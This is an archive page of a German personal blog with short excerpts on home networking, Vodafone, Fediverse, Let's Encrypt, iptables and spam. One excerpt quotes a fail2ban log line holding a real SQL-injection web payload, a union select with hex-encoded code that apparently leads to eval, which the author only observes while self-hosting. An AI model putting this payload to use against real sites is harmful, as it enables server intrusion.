Archiv der Rubrik 'Internet'
FritzBox und postfix
Freitag, 12. Mai 2023
Kürzlich habe ich mich ja damit befaßt, mit meiner FritzBox (6490) Faxe empfangen und versenden zu können. Das Fax-Menü in der Box ist dabei schon irritierend genug. Wenn man es öffnet, wird einem als erstes ein Formular zum Versand eines Faxes präsentiert, wobei einem das Teil nicht verrät, daß es für die Eingabe einen Timeout gibt; ich hab nicht genau drauf geachtet, aber es müßten 10 oder 15 Minuten sein. Die Übersicht, wann welche Faxe eingegangen sind oder gesendet wurden, bekommt man erst, wenn man dieses Formular mit Abbrechen schließt. Sagt einem auch niemand.
Damit weiß ich nun immerhin, wie ich an diese Faxe herankomme und sie betrachten und herunterladen kann. Allerdings muß ich dazu natürlich erstmal wissen, daß ein Fax eingegangen ist. Und deshalb wollte ich mir in diesem Fall jeweils eine Mail schicken lassen. Die FritzBox hat dafür einen sogenannten Push-Service, also quasi einen Schubs-Dienst 😉, mit welchem man das bewerkstelligen kann. Also, wenn der Mailserver mitspielt. (mehr …)
ClassicPress im Fediverse
Donnerstag, 30. März 2023
Es ist nur logisch, ClassicPress (wie auch WordPress) als dezentrale Blogging-Software mit dem dezentralen Fediverse zu verbinden. Also habe ich vor einiger Zeit das Plugin ActivityPub installiert. Nur: Mein Blog konnte und kann im Fediverse überwiegend nicht gefunden werden. Mastodon-Instanzen sehen es nicht. Hubzilla-Instanzen können es sehen, wie mir schon bestätigt wurde, aber das allein genügt ja nicht.
An dem Plugin gibt es zunächst etwas zu kritisieren. Vor vielen Jahren bereits hat sich bei WordPress die Erkenntnis durchgesetzt, daß es eine gute Idee sei, den Login-Namen und den Display-Namen der Blog-Autorenschaft zu trennen, weil damit die erste Hälfte der Login-Daten bereits offengelegt ist. ActivityPub publiziert die Beiträge nun unter @loginname@blog.name, und reißt damit diese Lücke wieder auf. Nun können Bots wieder versuchen, das Paßwort zum bekanntgegebenen Login-Namen zu erraten. Es wäre also angebracht, den Nutzenden die Möglichkeit zu geben, einen anderen als den Login-Namen anzugeben – oder einfach den Display-Namen (oder einen Teil davon, wenn zum Beispiel ein Leerzeichen enthalten ist) zu verwenden.
Ich verwende zwar WPS Hide Login und verstecke damit den Login, trotzdem habe ich zusätzlich direkt mal noch 2FA eingerichtet, damit da keine unerwünschten Dinge passieren.
Aber das ist leider nicht mein einziges Problem bei der Integration von ClassicPress ins Fediverse. (mehr …)
Webmaster-Spam auf neuem Level
Freitag, 24. März 2023
Eine nette Dame meinte, mich heute nochmal dran erinnern zu müssen, daß ich ihre Mail vom 16. März nicht beantwortet hätte. Naja, das hat ja vielleicht Gründe? Schauen wir mal:
Am 24.03.23 um 16:32 schrieb Julia Noack:
Liebes atari-frosch.de -Team,
1. Fehler: Impressum nicht gelesen. atari-frosch.de hat kein Team. Das ist meine private Site. Ja, auch das Blog und weitere Webdienste unter weiteren Subdomains. Spammer lesen praktisch nie das Impressum, oder wenn, dann nur, um eine Mailadresse abzugreifen, die man bespammen kann. Gern auch automatisiert. (mehr …)
Spaß mit Videos in Firefox
Samstag, 25. Februar 2023
Ich bin ja immer noch dabei, mein Piwigo-Upload-Verzeichnis zu fixen. Heute war ich mal an den Videos. Sollte ja einfach sein: Passend umbenennen (re-encoded sind sie schon), hochladen, Rechte anpassen. Bei denselben MP4-Dateien, die mplayer lokal einwandfrei abspielen kann, spielt mir der Player von Piwigo jedoch nur den Ton ab, das Bild bleibt schwarz.
Im Gegensatz zu Fotos kann man Videos in Piwigo nicht einfach über das Aktualisierungs-Plugin erneuern, also direkt in Piwigo neu hochladen, ohne den Datenbank-Eintrag zu ändern. Ich müßte diese Medien statt dessen ganz löschen und komplett neu anlegen. OK, in einem Fall habe ich das mal versucht. Ergebnis: Der Piwigo-Player merkt jetzt, daß da ein Video ist, kann es aber nicht abspielen. Begründung: „The media playback was aborted due to a corruption problem or because the media used features your browser did not support.“
Das heißt: Ich muß wohl sämtliche Videos neu re-encoden, weil da wohl eine veraltete MP4-Version vorliegt oder so. Und: Schuld ist nicht Piwigo, wie ich erst dachte, sondern Firefox.
Es darf ja nicht langweilig werden im Hause Frosch, ne. 😒 (mehr …)
Goodbye, Twitter
Freitag, 16. Dezember 2022
Gestern vor 14 Jahren schrieb ich meinen ersten Tweet auf Twitter:
@Atari-Frosch @AlexSchestag danke 🙂
8:14 PM Dec 15th, 2008 from web in reply to AlexSchestag
Und ich habe vieles mitgemacht: Umstellungen im Layout, die immer wieder gewöhnungsbedürftig waren. Die immer fetter werdende Weboberfläche. Smartphone-Apps von Drittanbietern, die immer wieder blockiert wurden, weil Twitter es doch ganz gerne gehabt hätte, wenn man ihre eigene nutzt, die einen mit Werbung („sponsored tweets“) vollballert – welche die Drittanbieter-Apps einfach rausfiltern. Dann die recht erholsame Umstellung auf Tweetdeck (Web). Damit und in Kombination mit dem AdBlocker uBlock Origin wurde Twitter dann endlich weitestgehend werbefrei benutzbar.
Bis Elon Musk kam und Twitter kaufte. Und was er aus der Plattform macht und noch machen will, mache ich nicht mehr mit. (mehr …)
Von Twitter ins Fediverse
Montag, 14. November 2022
Von Twitter auf Mastodon (oder generell ins Fediverse) zu wechseln ist so ein bißchen wie der Wechsel von Windows auf Linux. Erst erscheint alles furchtbar kompliziert, weil Du's seit mehr oder weniger langer Zeit nicht anders kennst, dann kann das eine nicht exakt dasselbe wie das andere, oder nicht auf die gleiche Art, oder Du mußt in ein anderes Menü und/oder die Funktion heißt anders. Aber wenn Du Dich reinfuchst, so wie Du Dich in das Gewohnte auch mal reinfuchsen mußtest, wirst Du merken, daß es 'ne Menge Vorteile hat.
Persönlich fand ich den Schritt jetzt nicht kompliziert, aber ich bekomme mit, daß es anderen da anders geht. Wenn man im Hinterkopf behält, daß Mastodon keine zentrale Plattform ist, sondern sich auf viele, meist privat betriebene Instanzen verteilt, die außerdem derzeit teilweise völlig überrannt und damit überlastet werden, wird einiges, was so kompliziert erscheint, recht schnell logisch erfaßbar.
In den letzten zwei Wochen ergab sich der nahezu komplette Wechsel für mich fast von alleine, schon dadurch, daß nach dem Kauf von Twitter durch Elon Musk plötzlich viele Menschen eine Alternative suchten und sich meine Timeline in meinem Mastodon-Tab quasi von alleine wieder aufbaute. Nicht komplett, das wird wohl auch nicht funktionieren, aber doch in einem Maße, das ich vorher nicht für möglich gehalten hätte. (mehr …)
Drei Wahrheiten, eine Lüge
Mittwoch, 27. Oktober 2021
… ist ein „Spiel“, das derzeit auf Twitter umgeht. Und weil ich grade Abwechslung brauchen konnte, habe ich mich gestern mal daran beteiligt.
Das Spiel geht so: Man postet vier Behauptungen über sich selbst. Drei davon sind wahr, eine ist falsch. Und die Followerschaft darf raten, welche der Behauptungen die falsche, also die Lüge ist.
Meine Behauptungen waren: (mehr …)
IP-Jonglieren mit Vodafone
Dienstag, 8. Juni 2021
Als ich letzten Monat, um meine Kosten zu reduzieren, einen neuen Internet-Tarif bei Vodafone buchte, hatte ich eigentlich überlegt, wieder in den Privatkundenbereich zurückzuwechseln, weil ich davon ausging, daß es dort günstiger ist als im Business-Bereich. Den Business-Tarif hatte ich ja nur, weil UnityMedia vor ihrem Verkauf an Vodafone – und als dieser noch nicht öffentlich bekannt war – die Business-Verträge angeboten hatte wie sauer Bier. Es ist zu vermuten, daß sie mit der deutlichen Erhöhung der Business-Verträge ihren Marktwert steigern wollten.
Allerdings war dieser BusinessVertrag nur in den ersten 24 Monaten günstig (rund 40,00 € im Monat), danach ging er auf über 70,00 € im Monat hoch, das war mir denn doch zu viel.
Vodafone lockte mich jedoch mit einem neuen Business-Vertrag, der zwar mehr kostet als die vorherigen 40, aber immerhin günstiger ist als die 70. Ich sollte statt der bisherigen 200 mBit/s Download und rund 20 mBit/s Upload 500 und 50 mBit/s bekommen, und außerdem eine feste IP-Adresse. Letzteres reizte mich sogar mehr als die Geschwindigkeit, denn damit kann ich zum Beispiel den Zugang zu den ssh-Ports auf den Servern auf diese Adresse festnageln und Angreifer, auch die Such-Bots, die regelmäßig die Ports abklappern, finden dann diesen Port nicht mehr. Die vorherige Geschwindigkeit hatte mir eigentlich vollkommen ausgereicht.
Nach der Tarifumstellung hatte ich dieselbe IPv4-Adresse wie vorher, in der IP-Range 84.119.0.0/16. Daher ging ich davon aus, daß sie diese letzte dynamisch zugeteilte IP einfach auf meinen Anschluß festgenagelt hatten und fand das äußerst praktisch. Ich paßte meine iptables-Regeln auf den Servern an und glaubte, daß ich daran nun nichts mehr verändern muß. Ich sollte mich irren. (mehr …)
Parteitag mal anders
Montag, 10. Mai 2021
An diesem Wochenende fand der erste Teil des ersten hybriden Bundesparteitags der Piratenpartei Deutschland statt. Eine gute Gelegenheit für mich, endlich mal wieder an einem Bundesparteitag teilzunehmen, ohne mit Reisekosten und -organisation belastet zu sein. Und ohne das Risiko, dann in einem Plenum zu sitzen, in dem um mich herum ständig geredet wird, so daß ich den zweiten Tag verliere, weil ich in der Nacht nach dem ersten zusammenbreche.
Dafür, daß es der erste so veranstaltete Bundesparteitag seiner Art ist, sieht das alles schon sehr gut aus. Natürlich lief noch nicht alles glatt. Zum Beispiel war da das ungültige Zertifikat des Mumble, in welches man anfangs reinmußte, um sich zu akkreditieren. Oder die eingeschränkten Netzkapazitäten vor Ort, die dem Jitsi (für öffentliche Wortmeldungen, Fragen, Reden, Vorstellungen etc.) offenbar gelegentlich Probleme bereiteten. (mehr …)
Angriffsversuch per Referer
Sonntag, 2. Mai 2021
Eben in einer Meldung von fail2ban gesehen:
114.219.10.161 - - [02/May/2021:08:02:47 +0200] "POST /user.php HTTP/1.1" 404 47 "45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:\x22num\x22;s:191:\x22*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7B24617364275D3B6576616C2F2A2A2F286261736536345F6465636F646528275A585A686243676B583142505531526259575274615735644B54733D2729293B2F2F7D787878,0--\x22;s:2:\x22id\x22;s:9:\x22' union/*\x22;s:4:\x22name\x22;s:3:\x22ads\x22;}45ea207d7a2b68c49582d2d22adf953a" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; AcooBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"
Ohne Recherche: Das sieht erstmal … seltsam aus. Vermutlich müßte man die Hex-Zahlenreihen aufdröseln, um zu erfahren, was er wirklich wollte. Die lesbaren Strings „select“ und „union“ deuten aber auf einen SQL-Angriff hin. Nur: Warum steht der im Referer? Was würde denn darauf anspringen? (mehr …)
Wenn Let’s Encrypt nicht erneuern will …
Freitag, 23. April 2021
Ich habe das jetzt schon ein paarmal beobachtet: Let's Encrypt, hier „vertreten“ durch den Certbot, meldet immer mal wieder für die eine oder andere (Sub-)Domain, daß eine Erneuerung des Zertifikats nicht möglich sei, weil die Bots, die die Challenge überprüfen, in einen Timeout gelaufen seien. Die Standard-Vermutung ist, sie seien in die Firewall geraten. Das passierte bisher sowohl hier auf meinem eigenen Server als auch auf dem Server eines Vereins, den ich administriere.
Und jedesmal überprüfte ich die vier IP-Adressen, mit denen Let's Encrypt zugreifen wollte, und sie standen natürlich nicht in der Firewall. fail2ban wußte jeweils auch nix davon.
Das Problem löst sich manchmal von selbst, indem Let's Encrypt dann doch irgendwann nach Tagen oder Wochen die Erneuerung durchführt, als wäre nichts gewesen. Aber manchmal will es gar nicht funktionieren, dann muß man etwas nachhelfen – so wie ich heute bei einer Subdomain, bei der sich der Certbot bereits seit 40 Tagen vergeblich um eine Erneuerung bemühte.
Die Lösung ist … unkonventionell und vom Typ „muß ich nicht verstehen, oder?“. So geht's: (mehr …)
Jahresrückblick 2020
Donnerstag, 31. Dezember 2020
In einem Wort: UFF.
OK, ich mach das ja üblicherweise etwas ausführlicher 😁, so here we go:
2020 fing erstmal so an, wie 2019 aufgehört hatte: Mit viel „geht nicht“ AKA exekutiver Dysfunktion.
- 26. Januar: Hofgarten und Rhein, 68 Fotos, Kamera: Canon EOS 750D
Ende Januar entdeckte ich die App TooGoodToGo. Obwohl ich gehofft hatte, darüber vor allem Obst und Gemüse günstig zu bekommen, blieb es in den ersten knapp drei Monaten zunächst bei Backwaren; Obst und Gemüse wurde nur wenig angeboten und war dann schneller ausverkauft, als ich am Smartphone wischen und klicken konnte. Damit änderten sich meine Frühstücks-Gewohnheiten: Statt Müsli habe ich nun meistens (aufgebackene) Brötchen oder Brot. Und damit konnte ich auch endlich die von meiner Mutter geerbten Marmeladen und Gelees verwerten, die in der Küche ein ganzes Regal belegten. (mehr …)
Fehlerbehebung à la Vodafone (2)
Donnerstag, 3. Dezember 2020
Mein Zugang ist weiterhin stabil, und das sollte jetzt laut Vodafone-Techniker auch so bleiben.
… schrieb ich am 30. November. Well. Es blieb nicht so. Und ich lernte, daß interne wie externe Kommunikation für Vodafone (so als Telekommunikationsunternehmen) offenbar ein Fremdwort ist. Das Drama ging also weiter:
01.12.2020 ca. 12:30 Uhr: Ich schalte den PC ein, schau gleich mal zum Router rüber (den ich im Sichtbereich, aber nicht im direkten Sichtfeld stehen habe) und sehe: Da blinkt was. Kurz drauf geht auch die rote Lampe an, was, wie ich in den letzten Tagen gelernt habe, das Signal dafür ist, daß die Verbindung seit mehr als einer Stunde weg ist. Also das Ganze nochmal von vorne … (mehr …)
Fehlerbehebung à la Vodafone
Montag, 30. November 2020
28.11.2020, ca. 23:40 Uhr: Ich schalte den PC aus, alles normal.
29.11.2020, 11:30 Uhr: Ich schalte den PC ein, Thunderbird sagt mir, er kann die Mailserver nicht erreichen. ping auf meinen Server: nix. ping auf Router: Anwesend. Aber die rote Lampe am Router ist an, und eine grüne Lampe, die eigentlich dauerhaft an sein sollte, blinkt. Ich kontaktiere @vodafoneservice auf Twitter, die schreiben mir – nach einer zweiten öffentlichen Beschwerde einige Stunden später – per DM, daß ich eine 0800-Nummer für Business-Kunden anrufen soll, weil sie selbst nur für private Kunden zuständig sind.
ca. 15:30 Uhr: Ich versuche, diese Nummer über Festnetz anzurufen, bekomme aber nur besetzt. Ich rufe anschließend die Nummer mit einem Mobiltelefon an, 10 Minuten Warteschleife, dann heißt es, am Folgetag werde sich ein Techniker einer externer Firma bei mir melden für einen Termin. (mehr …)
Spaß mit iptables
Donnerstag, 10. September 2020
Mit iptables kann man auf einem Linux-System festlegen, welche IP bzw. welche IP-Bereiche auf welche Ports bzw. überhaupt auf einen Host zugreifen dürfen. Nun hatte ich vor einiger Zeit festgestellt, daß es sozusagen Port-Sucher gibt, die – schön langsam, damit sie unterm Radar bleiben – nach und nach alles an denkbaren Ports an einem Host abklappern, um zu gucken, ob da vielleicht ein sshd läuft. Denn mittlerweile legt man den sshd nicht auf den üblichen Port 22, sondern auf einen anderen, meist einen so genannten hohen Port (> 1024).
Wenn diese Port-Sucher fündig werden, schicken sie eine ganze Ladung anderer Hosts los, um diesen sshd zu, ähm, belästigen. Das fand ich etwas störend, also wollte ich etwas dagegen unternehmen.
Zu diesem Zweck definierte ich eine Regel, die den Zugang auf den Port des sshd auf ein paar wenige IP-Adressen einschränkt. Auf diesen Server hier kommen seitdem nur noch die Hosts, auf denen ich selbst wiederum einen Shell-Zugang habe, und eben die IP, die mir mein ISP hier zu Hause zugewiesen hat. Praktischerweise schien die letztgenannte IP quasi-fest zu sein; ich meine, die hat sich seit zwei Jahren oder so nicht mehr geändert.
Von Montag auf Dienstag änderte sie sich nun doch. Und damit fing der Spaß an. (mehr …)